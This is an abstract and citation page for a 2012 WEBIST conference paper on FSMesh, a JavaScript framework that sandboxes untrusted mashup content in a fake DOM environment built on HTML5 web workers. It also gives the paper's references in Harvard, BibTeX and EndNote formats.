FSMesh - Flexibly Securing Mashups by User Defined DOM Environment

Yi Wang; Tao Guo; Zhiwei Shi; Zhoujun Li

doi:10.5220/0003899000960102

FSMesh - Flexibly Securing Mashups by User Defined DOM Environment

Yi Wang, Tao Guo, Zhiwei Shi, Zhoujun Li

2012

Abstract

A growing trend of nowadays web sites is to combine active content (applications) from untrusted sources, as in so-called mashups, in order to provide more functionality and expressiveness. Due to the potential risk of leaking sensitive information to these third-party sources, it is urgent to provide a secure “sandbox” for playing the untrusted content and allow developers to apply flexible security policy at the same time. In this paper, we propose and implement a new safe framework to prevent untrusted applications from interfering with each other based on HTML5 technology. By creating a separated fake DOM environment in the background, developers can load untrusted content into the “sandbox” and apply their custom security policy in real window or server side when receiving script generated messages from it. The advantage is that it is very flexible as the security policy is also written in JavaScript and requires minimum learning efforts for web developers. The drawback is that it is based on element “web workers” and method “postMessage” introduced in HTML5 and can’t be run in older browsers without these supports.

Download

Paper Citation

in Harvard Style

Wang Y., Shi Z., Guo T. and Li Z. (2012). FSMesh - Flexibly Securing Mashups by User Defined DOM Environment . In Proceedings of the 8th International Conference on Web Information Systems and Technologies - Volume 1: WEBIST, ISBN 978-989-8565-08-2, pages 96-102. DOI: 10.5220/0003899000960102

in Bibtex Style

@conference{webist12,
author={Yi Wang and Zhiwei Shi and Tao Guo and Zhoujun Li},
title={FSMesh - Flexibly Securing Mashups by User Defined DOM Environment},
booktitle={Proceedings of the 8th International Conference on Web Information Systems and Technologies - Volume 1: WEBIST,},
year={2012},
pages={96-102},
publisher={SciTePress},
organization={INSTICC},
doi={10.5220/0003899000960102},
isbn={978-989-8565-08-2},
}

in EndNote Style

TY - CONF
JO - Proceedings of the 8th International Conference on Web Information Systems and Technologies - Volume 1: WEBIST,
TI - FSMesh - Flexibly Securing Mashups by User Defined DOM Environment
SN - 978-989-8565-08-2
AU - Wang Y.
AU - Shi Z.
AU - Guo T.
AU - Li Z.
PY - 2012
SP - 96
EP - 102
DO - 10.5220/0003899000960102